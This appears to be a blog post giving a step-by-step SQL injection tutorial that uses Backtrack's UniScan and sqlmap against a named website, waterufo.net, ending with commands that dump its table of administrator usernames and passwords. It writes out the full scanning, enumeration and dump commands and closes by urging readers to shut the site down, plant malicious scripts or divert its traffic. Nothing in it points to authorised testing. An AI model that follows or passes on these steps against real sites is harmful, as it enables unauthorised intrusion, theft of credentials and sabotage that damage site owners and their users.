What Do We Need For This Attack ?
Backtrack 5 (Would work On Windows Too,Just find a sql injecting software)
SQLMAP - Automatic SQL injection and database takeover tool (Included in Backtrack)
Internet Access
Brains And Balls.
Lots Of Time.
Step-1 : Finding A Vulnerable Link.
This Is the MOST difficult step in this step, because there are thousands of links in a website and only some of them are capable of SQL Injection, So How to do it ?
The trick for this is to dig in the website and look for anything that might have access to an outside server,
We will use a scanner provided ny backtrack called "UniScan" which is good at finding vulnerable links.To Open It,Type This In your console (backtrack terminal) :
cd /pentest/web/uniscan && ./uniscan.pl
Follow the onscreen commands and run this tool to find the bug links,sure you can use other scanners.
Once you have found a link, check the link by adding (‘) ignore the brackets please, at the end of the link,
With an id or almost anything behind the php? and behind the = can be tested.
This is because we know it selected something from the database and this might be an entry point.
For Example :
Original "vulnerable" Link : http://www.waterufo.net/item.php?id=200
After adding the symbol : http://www.waterufo.net/item.php?id=200'
If a MySQL error occurs? Then it most likely is vulnerable to SQL Injection.
Example of a MySQL error:
You have an error in your SQL syntax;
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''
YAYY !
Step 2 : Starting and Setting Up SQLMap :
The SQLMap is the best sql injecting tool ever made, It is good for both beginners and experts, To start it, Type the below command in console :
cd /pentest/web/scanners/sqlmap
Once it has Started, Change this command to your requirements and press enter :
./sqlmap.py -u (your bug link here) --level 5 --risk 3 --dbs
This command will scan the full website by the help of your vulnerable link you inserted.
Now let the scan continue and wait for something like this :
If this appears, you have made you path inside that website, now press N to stop the scan cause we have already found and exploited the vulnerability.
Step 3 : Finding The Columns And Tables ( The Guess Game ) -
As we all know, the data on a website is stored in databases,inside that databases, there are tables and columns, and inside them are the required data.
Suppose my database is waterufo.net,and you have to change it as per your requirements, i'm just supposing so you can understand.We will now type this command to get the tables :
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net
You will get something like this :
Now run this command to grab the columns :
/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net
it will display the columns in the table "fl_users",Something Like This :
Step 4 : Retrieving Usernames And Passwords -
To retrieve the column values, type --dump at the end of the previous query
For Example :
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump
You will be presented with the values stored in that columns, In my case, that was the list of Administrator Usernames And Passwords :
So now you have the administrator usernames and passwords, you can do a lot of things with it for example :
-> Shutdown The Website
-> Insert A Malicious Script In the website,
-> Divert their traffic to other place.
-> Write those Passwords on a brick and hit your Neighbors Kid.
Any of the above will do a lot of damage.
0 comments:
Post a Comment